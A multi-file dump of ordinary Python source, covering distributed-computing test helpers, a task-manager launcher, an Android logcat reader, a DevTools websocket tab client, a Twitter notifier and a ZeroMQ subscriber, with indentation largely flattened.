for c in _global_clients.values()
if c.status != "closed"
]
try:
start = time()
while time() < start + 5:
gc.collect()
if not get_unclosed():
break
await asyncio.sleep(0.05)
else:
if allow_unclosed:
print(f"Unclosed Comms: {get_unclosed()}")
else:
raise RuntimeError("Unclosed Comms", get_unclosed())
finally:
Comm._instances.clear()
_global_clients.clear()
return result
result = loop.run_sync(
coro, timeout=timeout * 2 if timeout else timeout
)
for w in workers:
if getattr(w, "data", None):
try:
w.data.clear()
except EnvironmentError:
# zict backends can fail if their storage directory
# was already removed
pass
del w.data
return result
return test_func
return _
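# Illustrative sketch (not part of the original module): how a test would
# typically use the gen_cluster decorator defined above. The submitted closure
# and the assertion are examples only; any picklable callable works.
@gen_cluster(client=True)
async def _example_gen_cluster_usage(c, s, a, b):
    # c is a Client, s the Scheduler, a and b the two default Workers
    future = c.submit(lambda x: x + 1, 10)
    result = await future
    assert result == 11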
def raises(func, exc=Exception):
try:
func()
return False
except exc:
return True
def terminate_process(proc):
if proc.poll() is None:
if sys.platform.startswith("win"):
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGINT)
try:
proc.wait(10)
finally:
# Make sure we don't leave the process lingering around
with suppress(OSError):
proc.kill()
@contextmanager
def popen(args, **kwargs):
kwargs["stdout"] = subprocess.PIPE
kwargs["stderr"] = subprocess.PIPE
if sys.platform.startswith("win"):
# Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT
kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
dump_stdout = False
args = list(args)
if sys.platform.startswith("win"):
args[0] = os.path.join(sys.prefix, "Scripts", args[0])
else:
args[0] = os.path.join(
os.environ.get("DESTDIR", "") + sys.prefix, "bin", args[0]
)
proc = subprocess.Popen(args, **kwargs)
try:
yield proc
except Exception:
dump_stdout = True
raise
finally:
try:
terminate_process(proc)
finally:
# XXX Also dump stdout if return code != 0 ?
out, err = proc.communicate()
if dump_stdout:
print("\n\nPrint from stderr\n %s\n=================\n" % args[0][0])
print(err.decode())
print("\n\nPrint from stdout\n=================\n")
print(out.decode())
def wait_for_port(address, timeout=5):
assert isinstance(address, tuple)
deadline = time() + timeout
while True:
timeout = deadline - time()
if timeout < 0:
raise RuntimeError("Failed to connect to %s" % (address,))
try:
sock = socket.create_connection(address, timeout=timeout)
except EnvironmentError:
pass
else:
sock.close()
break
def wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail("condition not reached until %s seconds" % (timeout,))
async def async_wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
await asyncio.sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail("condition not reached until %s seconds" % (timeout,))
@memoize
def has_ipv6():
"""
Return whether IPv6 is locally functional. This doesn't guarantee IPv6
is properly configured outside of localhost.
"""
serv = cli = None
try:
serv = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
serv.bind(("::", 0))
serv.listen(5)
cli = socket.create_connection(serv.getsockname()[:2])
except EnvironmentError:
return False
else:
return True
finally:
if cli is not None:
cli.close()
if serv is not None:
serv.close()
if has_ipv6():
def requires_ipv6(test_func):
return test_func
else:
requires_ipv6 = pytest.mark.skip("ipv6 required")
async def assert_can_connect(addr, timeout=0.5, **kwargs):
"""
Check that it is possible to connect to the distributed *addr*
within the given *timeout*.
"""
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_cannot_connect(
addr, timeout=0.5, exception_class=EnvironmentError, **kwargs
):
"""
Check that it is impossible to connect to the distributed *addr*
within the given *timeout*.
"""
with pytest.raises(exception_class):
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_can_connect_from_everywhere_4_6(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 and IPv6 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_can_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_4(
port, protocol="tcp", **kwargs,
):
"""
Check that the local *port* is reachable from all IPv4 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_cannot_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_cannot_connect(
"%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs
),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_4(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv4 addresses.
"""
futures = [assert_can_connect("tcp://127.0.0.1:%d" % port, **kwargs)]
if get_ip() != "127.0.0.1": # No outside IPv4 connectivity?
futures += [assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs)]
if has_ipv6():
futures += [
assert_cannot_connect("tcp://[::1]:%d" % port, **kwargs),
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_6(port, **kwargs):
"""
Check that the local *port* is reachable from all IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
assert_can_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_6(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
]
if get_ipv6() != "::1": # No outside IPv6 connectivity?
futures += [
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs)
]
await asyncio.gather(*futures)
@contextmanager
def captured_logger(logger, level=logging.INFO, propagate=None):
"""Capture output from the given Logger.
"""
if isinstance(logger, str):
logger = logging.getLogger(logger)
orig_level = logger.level
orig_handlers = logger.handlers[:]
if propagate is not None:
orig_propagate = logger.propagate
logger.propagate = propagate
sio = io.StringIO()
logger.handlers[:] = [logging.StreamHandler(sio)]
logger.setLevel(level)
try:
yield sio
finally:
logger.handlers[:] = orig_handlers
logger.setLevel(orig_level)
if propagate is not None:
logger.propagate = orig_propagate
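# Illustrative sketch (not part of the original module): capturing log output
# in a test with the captured_logger context manager above. The logger name
# and message are arbitrary examples.
def _example_captured_logger_usage():
    with captured_logger("distributed.example") as sio:
        logging.getLogger("distributed.example").warning("something happened")
    assert "something happened" in sio.getvalue()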
@contextmanager
def captured_handler(handler):
"""Capture output from the given logging.StreamHandler.
"""
assert isinstance(handler, logging.StreamHandler)
orig_stream = handler.stream
handler.stream = io.StringIO()
try:
yield handler.stream
finally:
handler.stream = orig_stream
@contextmanager
def new_config(new_config):
"""
Temporarily change configuration dictionary.
"""
from .config import defaults
config = dask.config.config
orig_config = copy.deepcopy(config)
try:
config.clear()
config.update(copy.deepcopy(defaults))
dask.config.update(config, new_config)
initialize_logging(config)
yield
finally:
config.clear()
config.update(orig_config)
initialize_logging(config)
@contextmanager
def new_environment(changes):
saved_environ = os.environ.copy()
os.environ.update(changes)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
@contextmanager
def new_config_file(c):
"""
Temporarily change configuration file to match dictionary *c*.
"""
import yaml
old_file = os.environ.get("DASK_CONFIG")
fd, path = tempfile.mkstemp(prefix="dask-config")
try:
with os.fdopen(fd, "w") as f:
f.write(yaml.dump(c))
os.environ["DASK_CONFIG"] = path
try:
yield
finally:
if old_file:
os.environ["DASK_CONFIG"] = old_file
else:
del os.environ["DASK_CONFIG"]
finally:
os.remove(path)
certs_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "tests"))
def get_cert(filename):
"""
Get the path to one of the test TLS certificates.
"""
path = os.path.join(certs_dir, filename)
assert os.path.exists(path), path
return path
def tls_config():
"""
A functional TLS configuration with our test certs.
"""
ca_file = get_cert("tls-ca-cert.pem")
keycert = get_cert("tls-key-cert.pem")
return {
"distributed": {
"comm": {
"tls": {
"ca-file": ca_file,
"client": {"cert": keycert},
"scheduler": {"cert": keycert},
"worker": {"cert": keycert},
}
}
}
}
def tls_only_config():
"""
A functional TLS configuration with our test certs, disallowing
plain TCP communications.
"""
c = tls_config()
c["distributed"]["comm"]["require-encryption"] = True
return c
def tls_security():
"""
A Security object with proper TLS configuration.
"""
with new_config(tls_config()):
sec = Security()
return sec
def tls_only_security():
"""
A Security object with proper TLS configuration and disallowing plain
TCP communications.
"""
with new_config(tls_only_config()):
sec = Security()
assert sec.require_encryption
return sec
def get_server_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def get_client_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def bump_rlimit(limit, desired):
resource = pytest.importorskip("resource")
try:
soft, hard = resource.getrlimit(limit)
if soft < desired:
resource.setrlimit(limit, (desired, max(hard, desired)))
except Exception as e:
pytest.skip("rlimit too low (%s) and can't be increased: %s" % (soft, e))
def gen_tls_cluster(**kwargs):
kwargs.setdefault("nthreads", [("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)])
return gen_cluster(
scheduler="tls://127.0.0.1", security=tls_only_security(), **kwargs
)
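# Illustrative sketch (not part of the original module): gen_tls_cluster is
# used exactly like gen_cluster, but every address is a tls:// address backed
# by the bundled test certificates.
@gen_tls_cluster(client=True)
async def _example_tls_cluster_usage(c, s, a, b):
    assert s.address.startswith("tls://")
    assert (await c.submit(lambda: 1)) == 1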
@contextmanager
def save_sys_modules():
    # snapshot copies, so that additions made inside the block can be detected
    old_modules = dict(sys.modules)
    old_path = list(sys.path)
    try:
        yield
    finally:
        # iterate over copies so that deletion does not invalidate iteration
        sys.path[:] = [elem for elem in sys.path if elem in old_path]
        for elem in list(sys.modules):
            if elem not in old_modules:
                del sys.modules[elem]
@contextmanager
def check_thread_leak():
active_threads_start = set(threading._active)
yield
start = time()
while True:
bad = [
t
for t, v in threading._active.items()
if t not in active_threads_start
and "Threaded" not in v.name
and "watch message" not in v.name
and "TCP-Executor" not in v.name
]
if not bad:
break
else:
sleep(0.01)
if time() > start + 5:
from distributed import profile
tid = bad[0]
thread = threading._active[tid]
call_stacks = profile.call_stack(sys._current_frames()[tid])
assert False, (thread, call_stacks)
@contextmanager
def check_process_leak(check=True):
for proc in mp_context.active_children():
proc.terminate()
yield
if check:
for i in range(100):
if not set(mp_context.active_children()):
break
else:
sleep(0.2)
else:
assert not mp_context.active_children()
_cleanup_dangling()
for proc in mp_context.active_children():
proc.terminate()
@contextmanager
def check_instances():
Client._instances.clear()
Worker._instances.clear()
Scheduler._instances.clear()
SpecCluster._instances.clear()
# assert all(n.status == "closed" for n in Nanny._instances), {
# n: n.status for n in Nanny._instances
# }
Nanny._instances.clear()
_global_clients.clear()
Comm._instances.clear()
yield
start = time()
while set(_global_clients):
sleep(0.1)
assert time() < start + 10
_global_clients.clear()
for w in Worker._instances:
with suppress(RuntimeError): # closed IOLoop
w.loop.add_callback(w.close, report=False, executor_wait=False)
if w.status == "running":
w.loop.add_callback(w.close)
Worker._instances.clear()
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
sleep(0.1)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
print("Unclosed Comms", L)
# raise ValueError("Unclosed Comms", L)
assert all(n.status == "closed" or n.status == "init" for n in Nanny._instances), {
n: n.status for n in Nanny._instances
}
# assert not list(SpecCluster._instances) # TODO
assert all(c.status == "closed" for c in SpecCluster._instances), list(
SpecCluster._instances
)
SpecCluster._instances.clear()
Nanny._instances.clear()
DequeHandler.clear_all_instances()
@contextmanager
def clean(threads=not WINDOWS, instances=True, timeout=1, processes=True):
@contextmanager
def null():
yield
with check_thread_leak() if threads else null():
with pristine_loop() as loop:
with check_process_leak(check=processes):
with check_instances() if instances else null():
with check_active_rpc(loop, timeout):
reset_config()
dask.config.set({"distributed.comm.timeouts.connect": "5s"})
# Restore default logging levels
# XXX use pytest hooks/fixtures instead?
for name, level in logging_levels.items():
logging.getLogger(name).setLevel(level)
yield loop
with suppress(AttributeError):
del thread_state.on_event_loop_thread
@pytest.fixture
def cleanup():
with clean():
yield
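# Illustrative sketch (not part of the original module): a test that manages
# its own servers can request the `cleanup` fixture above to get thread,
# process, instance and RPC leak checking around it. Assumes an asyncio-aware
# test runner (e.g. pytest-asyncio) for the async test function.
async def _example_cleanup_fixture_usage(cleanup):
    async with Scheduler(port=0) as s:
        async with Worker(s.address) as w:
            assert w.address in s.workers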
|
task_manager.py
|
#!/usr/bin/env python
import os
import sys
from os import _exit, getenv
from sys import stderr
#from version import gversion
PROGRAM_INFO = "VddbAsync task_manager 1.2.1.0"
if len(sys.argv) > 1:
    print(PROGRAM_INFO)
sys.exit(0)
path = getenv('MW_HOME')
if path is None:
    stderr.write("MW_HOME not set in environment, program cannot start.\n")
    _exit(1)
sys.path.append('/'.join([path, 'lib']))
os.environ['PATH'] = ':'.join([os.environ['PATH'], '/'.join([path, 'bin'])])
from cleaner import cleaner_cluster
from manager import manager
from parse_config import parse_config
from fetcher import fetcher
from loader import load_database
from picker import picker
from utils import check_kingship, make_db_pool, start_dbpc, make_hbase_pool, \
make_redis_conn
#from dbpcer import dbpcer
from dbpc import dbpc
import logging.config
from threading import Condition, Event, Lock, Thread
import getopt
DB_RESERVE_CONN = 5
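# Illustrative sketch (not part of the original script): the Event-based
# startup ordering used in main() below, in miniature. Worker threads block
# until the kingship check / first database load has signalled readiness.
def _example_startup_ordering():
    ready = Event()

    def worker():
        ready.wait()    # block until the loader/king signals readiness
        # ... do the actual work here ...

    Thread(target=worker).start()
    ready.set()         # loader side: release every waiting worker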
def main():
# use MW_HOME to find etc/ & var/ directories
path = getenv('MW_HOME')
    if path is None:
        stderr.write("MW_HOME not set in environment, program cannot start.\n")
        _exit(1)
logging.config.fileConfig('/'.join([path, 'etc', 'logging.conf']),
disable_existing_loggers=False)
config = parse_config('/'.join([path, 'etc', 'vddb_async.conf']))
start_dbpc(config, 'task_manager')
    # make the db connection pool; assign one connection to each db-accessing
    # thread: kingship checker + db loader + task fetcher + task cleaner
    # (4 threads) + 1 for the manager thread pool, plus the cleaner workers
db_pool = make_db_pool(config, DB_RESERVE_CONN + int(config['cleaner_threads_num']))
# kingship granted event, all threads wait till this event is set
hbase_pool = make_hbase_pool(config)
kev = Event()
kev.clear()
    # db load finished event; all threads wait till this event is set
lev = Event()
lev.clear()
# conditions each thread wait on, named after the waiter
fetch_cond = Condition(Lock())
pick_cond = Condition(Lock())
manage_cond = Condition(Lock())
clean_cond = Condition(Lock())
# kingship checker
check = Thread(target=check_kingship,
args=(config, db_pool, kev, config['tm_module_name'],
                   # NOTE: if the task manager stops working for X minutes,
                   # tasks won't be scheduled or executed for X minutes.
                   # Since tasks have to finish in a timely fashion, the
                   # task manager master timeout should not be too long.
int(config['tm_master_timeout']),
logging.getLogger('mwtm_tmcheck')))
check.start()
# all other threads wait here
kev.wait()
# this event is never cleared
#assert kev.isSet()
# worker threads, created in dependence order
fetch = fetcher(config, db_pool, fetch_cond, pick_cond)
clean = cleaner_cluster(config, db_pool, hbase_pool, clean_cond, manage_cond)
manage = manager(config, db_pool, manage_cond, pick_cond, clean)
pick = picker(config, pick_cond, fetch, manage)
# db config observers, loader will notify them when there's new data loaded
observers = [fetch, pick, manage, clean]
load = Thread(target=load_database, args=(config, db_pool, lev, observers))
# start the loader, and make other threads wait for the first load
load.start()
lev.wait()
assert lev.isSet()
# start all other threads
fetch.start()
clean.start()
manage.start()
pick.start()
    # the worker threads never return, so joining them here would be pointless
if __name__ == '__main__':
    main()
|
logcat.py
|
import subprocess
import logging
import copy
from .adapter import Adapter
class Logcat(Adapter):
"""
A connection with the target device through logcat.
"""
def __init__(self, device=None):
"""
initialize logcat connection
:param device: a Device instance
"""
self.logger = logging.getLogger(self.__class__.__name__)
if device is None:
from droidbot.device import Device
device = Device()
self.device = device
self.connected = False
self.process = None
self.parsers = []
self.recent_lines = []
if device.output_dir is None:
self.out_file = None
else:
self.out_file = "%s/logcat.txt" % device.output_dir
def connect(self):
self.device.adb.run_cmd("logcat -c")
self.process = subprocess.Popen(["adb", "-s", self.device.serial, "logcat", "-v", "threadtime", "*:I"],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
import threading
listen_thread = threading.Thread(target=self.handle_output)
listen_thread.start()
def disconnect(self):
self.connected = False
if self.process is not None:
self.process.terminate()
def check_connectivity(self):
return self.connected
def get_recent_lines(self):
lines = self.recent_lines
self.recent_lines = []
return lines
def handle_output(self):
self.connected = True
f = None
if self.out_file is not None:
f = open(self.out_file, 'w', encoding='utf-8')
while self.connected:
if self.process is None:
continue
line = self.process.stdout.readline()
if not isinstance(line, str):
line = line.decode()
self.recent_lines.append(line)
self.parse_line(line)
if f is not None:
f.write(line)
if f is not None:
f.close()
print("[CONNECTION] %s is disconnected" % self.__class__.__name__)
def parse_line(self, logcat_line):
for parser in self.parsers:
parser.parse(logcat_line)
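# Illustrative sketch (not part of the original module): typical use of the
# Logcat adapter above. Device comes from droidbot; the output directory is
# an assumption for this example.
def _example_logcat_usage():
    from droidbot.device import Device
    device = Device(output_dir="/tmp/droidbot_out")  # hypothetical output dir
    logcat = Logcat(device)
    logcat.connect()                    # clears the log and starts the reader thread
    lines = logcat.get_recent_lines()   # drain whatever has arrived so far
    logcat.disconnect()
    return lines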
|
tab.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
import json
import logging
import warnings
import threading
import functools
import websocket
from .exceptions import *
try:
import Queue as queue
except ImportError:
import queue
__all__ = ["Tab"]
logger = logging.getLogger(__name__)
class GenericAttr(object):
def __init__(self, name, tab):
self.__dict__['name'] = name
self.__dict__['tab'] = tab
def __getattr__(self, item):
method_name = "%s.%s" % (self.name, item)
event_listener = self.tab.get_listener(method_name)
if event_listener:
return event_listener
return functools.partial(self.tab.call_method, method_name)
def __setattr__(self, key, value):
self.tab.set_listener("%s.%s" % (self.name, key), value)
class Tab(object):
status_initial = 'initial'
status_started = 'started'
status_stopped = 'stopped'
def __init__(self, **kwargs):
self.id = kwargs.get("id")
self.type = kwargs.get("type")
self.debug = os.getenv("DEBUG", False)
self._websocket_url = kwargs.get("webSocketDebuggerUrl")
self._kwargs = kwargs
self._cur_id = 1000
self._ws = None
self._recv_th = threading.Thread(target=self._recv_loop)
self._recv_th.daemon = True
self._handle_event_th = threading.Thread(target=self._handle_event_loop)
self._handle_event_th.daemon = True
self._stopped = threading.Event()
self._started = False
self.status = self.status_initial
self.event_handlers = {}
self.method_results = {}
self.event_queue = queue.Queue()
def _send(self, message, timeout=None):
if 'id' not in message:
self._cur_id += 1
message['id'] = self._cur_id
message_json = json.dumps(message)
if self.debug: # pragma: no cover
print("SEND > %s" % message_json)
if not isinstance(timeout, (int, float)) or timeout > 1:
q_timeout = 1
else:
q_timeout = timeout / 2.0
try:
self.method_results[message['id']] = queue.Queue()
# just raise the exception to user
self._ws.send(message_json)
while not self._stopped.is_set():
try:
if isinstance(timeout, (int, float)):
if timeout < q_timeout:
q_timeout = timeout
timeout -= q_timeout
return self.method_results[message['id']].get(timeout=q_timeout)
except queue.Empty:
if isinstance(timeout, (int, float)) and timeout <= 0:
raise TimeoutException("Calling %s timeout" % message['method'])
continue
raise UserAbortException("User abort, call stop() when calling %s" % message['method'])
finally:
self.method_results.pop(message['id'], None)
def _recv_loop(self):
while not self._stopped.is_set():
try:
self._ws.settimeout(1)
message_json = self._ws.recv()
message = json.loads(message_json)
except websocket.WebSocketTimeoutException:
continue
except (websocket.WebSocketException, OSError):
if not self._stopped.is_set():
logger.error("websocket exception", exc_info=True)
self._stopped.set()
return
if self.debug: # pragma: no cover
print('< RECV %s' % message_json)
if "method" in message:
self.event_queue.put(message)
elif "id" in message:
if message["id"] in self.method_results:
self.method_results[message['id']].put(message)
else: # pragma: no cover
warnings.warn("unknown message: %s" % message)
def _handle_event_loop(self):
while not self._stopped.is_set():
try:
event = self.event_queue.get(timeout=1)
except queue.Empty:
continue
if event['method'] in self.event_handlers:
try:
self.event_handlers[event['method']](**event['params'])
except Exception as e:
logger.error("callback %s exception" % event['method'], exc_info=True)
self.event_queue.task_done()
def __getattr__(self, item):
attr = GenericAttr(item, self)
setattr(self, item, attr)
return attr
def call_method(self, _method, *args, **kwargs):
if not self._started:
raise RuntimeException("Cannot call method before it is started")
if args:
raise CallMethodException("the params should be key=value format")
if self._stopped.is_set():
raise RuntimeException("Tab has been stopped")
timeout = kwargs.pop("_timeout", None)
result = self._send({"method": _method, "params": kwargs}, timeout=timeout)
if 'result' not in result and 'error' in result:
warnings.warn("%s error: %s" % (_method, result['error']['message']))
raise CallMethodException("calling method: %s error: %s" % (_method, result['error']['message']))
return result['result']
def set_listener(self, event, callback):
if not callback:
return self.event_handlers.pop(event, None)
if not callable(callback):
raise RuntimeException("callback should be callable")
self.event_handlers[event] = callback
return True
def get_listener(self, event):
return self.event_handlers.get(event, None)
def del_all_listeners(self):
self.event_handlers = {}
return True
def start(self):
if self._started:
return False
if not self._websocket_url:
raise RuntimeException("Already has another client connect to this tab")
self._started = True
self.status = self.status_started
self._stopped.clear()
self._ws = websocket.create_connection(self._websocket_url, enable_multithread=True)
self._recv_th.start()
self._handle_event_th.start()
return True
def stop(self):
if self._stopped.is_set():
return False
if not self._started:
raise RuntimeException("Tab is not running")
self.status = self.status_stopped
self._stopped.set()
if self._ws:
self._ws.close()
return True
def wait(self, timeout=None):
if not self._started:
raise RuntimeException("Tab is not running")
if timeout:
return self._stopped.wait(timeout)
self._recv_th.join()
self._handle_event_th.join()
return True
def __str__(self):
return "<Tab [%s]>" % self.id
__repr__ = __str__
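# Illustrative sketch (not part of the original module): driving a DevTools
# tab with the Tab class above. The websocket URL is hypothetical; in practice
# it comes from the browser's /json endpoint.
def _example_tab_usage():
    tab = Tab(id="example", type="page",
              webSocketDebuggerUrl="ws://127.0.0.1:9222/devtools/page/example")
    tab.start()
    tab.Page.enable()                   # resolved via GenericAttr -> call_method
    tab.call_method("Page.navigate", url="https://example.com", _timeout=5)
    tab.stop()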
|
TFFPNotifier.py
|
from .NotifierClass import Notifier
import twitter
from datetime import datetime, timedelta
import time
import threading
class TFFPNotifier(Notifier):
def __init__(self,cfgParser,insec):
self.header = insec
try:
self.screenname = cfgParser.get(insec,"username").strip()
except:
self.screenname = ''
self.conskey = cfgParser.get(insec,"conskey").strip()
self.conssecret = cfgParser.get(insec,"conssecret").strip()
self.acctokenkey = cfgParser.get(insec,"acctokenkey").strip()
self.acctokensecret = cfgParser.get(insec,"acctokensecret").strip()
self.waitminutes = cfgParser.getint(insec,"waitminutes")
try:
self.hashtag = cfgParser.get(insec,"hashtag").strip()
except:
self.hashtag = "#tweetsfromfirstplace"
try:
self.viatag = cfgParser.get(insec,"viatag").strip()
except:
self.viatag = "/via bot"
def pushResults(self,newres):
        # the only thing this notifier cares about is the final result, and
        # even that only matters once the configured number of minutes has passed
if "finals" in newres:
for finalDict in newres["finals"]:
if "result" in finalDict:
if (finalDict["result"] == "win" and "1st" in finalDict["standings"]):
waittweet = threading.Thread(target=self._wait_and_tweet,args=())
#print "thread constructed"
waittweet.start()
def _wait_and_tweet(self):
api = twitter.Api(consumer_key=self.conskey, consumer_secret=self.conssecret,
access_token_key=self.acctokenkey, access_token_secret=self.acctokensecret)
#print "got api, waiting"
if self.screenname == '':
api.PostUpdate(self.hashtag + " " + self.viatag)
else:
time.sleep(60*self.waitminutes)
#print "calling has_t"
if not self._has_tweeted(api):
#print "tweeting!"
api.PostUpdate(self.hashtag + " " + self.viatag)
def _has_tweeted(self,api):
tl = api.GetUserTimeline(screen_name=self.screenname)
curt = datetime.utcnow()
for st in tl:
st_datetime = datetime.strptime(st.created_at,"%a %b %d %H:%M:%S +0000 %Y")
if ( (curt-st_datetime) > timedelta(minutes=self.waitminutes+10) ):
# we're out of tweets within the range we have to care about
break
elif self.hashtag in st.text:
# already tweeted, go home
return True
return False
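# Illustrative sketch (not part of the original module): wiring the notifier up
# from an INI-style config. The section and option names follow the accesses in
# __init__ above; the values themselves are placeholders.
def _example_build_notifier():
    import configparser
    cfg = configparser.ConfigParser()
    cfg["twitter"] = {
        "username": "example_user",
        "conskey": "xxx", "conssecret": "xxx",
        "acctokenkey": "xxx", "acctokensecret": "xxx",
        "waitminutes": "15",
    }
    return TFFPNotifier(cfg, "twitter")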
|
subscribe.py
|
# coding=utf-8
import zmq
import threading
import uuid
from google.protobuf.message import DecodeError
from fysom import Fysom
import machinetalk.protobuf.types_pb2 as pb
from machinetalk.protobuf.message_pb2 import Container
class Subscribe(object):
def __init__(self, debuglevel=0, debugname='Subscribe'):
self.debuglevel = debuglevel
self.debugname = debugname
self._error_string = ''
self.on_error_string_changed = []
# ZeroMQ
context = zmq.Context()
context.linger = 0
self._context = context
        # pipe used to signal a shutdown
self._shutdown = context.socket(zmq.PUSH)
self._shutdown_uri = b'inproc://shutdown-%s' % str(uuid.uuid4()).encode()
self._shutdown.bind(self._shutdown_uri)
        self._thread = None  # socket worker thread
self._tx_lock = threading.Lock() # lock for outgoing messages
# Socket
self.socket_uri = ''
self._socket_topics = set()
# more efficient to reuse protobuf messages
self._socket_rx = Container()
# Heartbeat
self._heartbeat_lock = threading.Lock()
self._heartbeat_interval = 2500
self._heartbeat_timer = None
self._heartbeat_active = False
self._heartbeat_liveness = 0
self._heartbeat_reset_liveness = 5
# callbacks
self.on_socket_message_received = []
self.on_state_changed = []
# fsm
self._fsm = Fysom(
{
'initial': 'down',
'events': [
{'name': 'start', 'src': 'down', 'dst': 'trying'},
{'name': 'full_update_received', 'src': 'trying', 'dst': 'up'},
{'name': 'stop', 'src': 'trying', 'dst': 'down'},
{'name': 'heartbeat_timeout', 'src': 'up', 'dst': 'trying'},
{'name': 'heartbeat_tick', 'src': 'up', 'dst': 'up'},
{'name': 'any_msg_received', 'src': 'up', 'dst': 'up'},
{'name': 'stop', 'src': 'up', 'dst': 'down'},
],
}
)
self._fsm.ondown = self._on_fsm_down
self._fsm.onafterstart = self._on_fsm_start
self._fsm.ontrying = self._on_fsm_trying
self._fsm.onafterfull_update_received = self._on_fsm_full_update_received
self._fsm.onafterstop = self._on_fsm_stop
self._fsm.onup = self._on_fsm_up
self._fsm.onafterheartbeat_timeout = self._on_fsm_heartbeat_timeout
self._fsm.onafterheartbeat_tick = self._on_fsm_heartbeat_tick
self._fsm.onafterany_msg_received = self._on_fsm_any_msg_received
def _on_fsm_down(self, _):
if self.debuglevel > 0:
print('[%s]: state DOWN' % self.debugname)
for cb in self.on_state_changed:
cb('down')
return True
def _on_fsm_start(self, _):
if self.debuglevel > 0:
print('[%s]: event START' % self.debugname)
self.start_socket()
return True
def _on_fsm_trying(self, _):
if self.debuglevel > 0:
print('[%s]: state TRYING' % self.debugname)
for cb in self.on_state_changed:
cb('trying')
return True
def _on_fsm_full_update_received(self, _):
if self.debuglevel > 0:
print('[%s]: event FULL UPDATE RECEIVED' % self.debugname)
self.reset_heartbeat_liveness()
self.start_heartbeat_timer()
return True
def _on_fsm_stop(self, _):
if self.debuglevel > 0:
print('[%s]: event STOP' % self.debugname)
self.stop_heartbeat_timer()
self.stop_socket()
return True
def _on_fsm_up(self, _):
if self.debuglevel > 0:
print('[%s]: state UP' % self.debugname)
for cb in self.on_state_changed:
cb('up')
return True
def _on_fsm_heartbeat_timeout(self, _):
if self.debuglevel > 0:
print('[%s]: event HEARTBEAT TIMEOUT' % self.debugname)
self.stop_heartbeat_timer()
self.stop_socket()
self.start_socket()
return True
def _on_fsm_heartbeat_tick(self, _):
if self.debuglevel > 0:
print('[%s]: event HEARTBEAT TICK' % self.debugname)
self.reset_heartbeat_timer()
return True
def _on_fsm_any_msg_received(self, _):
if self.debuglevel > 0:
print('[%s]: event ANY MSG RECEIVED' % self.debugname)
self.reset_heartbeat_liveness()
self.reset_heartbeat_timer()
return True
@property
def error_string(self):
return self._error_string
@error_string.setter
def error_string(self, string):
if self._error_string is string:
return
self._error_string = string
for cb in self.on_error_string_changed:
cb(string)
def start(self):
if self._fsm.isstate('down'):
self._fsm.start()
def stop(self):
if self._fsm.isstate('trying'):
self._fsm.stop()
elif self._fsm.isstate('up'):
self._fsm.stop()
def add_socket_topic(self, name):
self._socket_topics.add(name)
def remove_socket_topic(self, name):
self._socket_topics.remove(name)
def clear_socket_topics(self):
self._socket_topics.clear()
def _socket_worker(self, context, uri):
poll = zmq.Poller()
socket = context.socket(zmq.SUB)
socket.setsockopt(zmq.LINGER, 0)
socket.connect(uri)
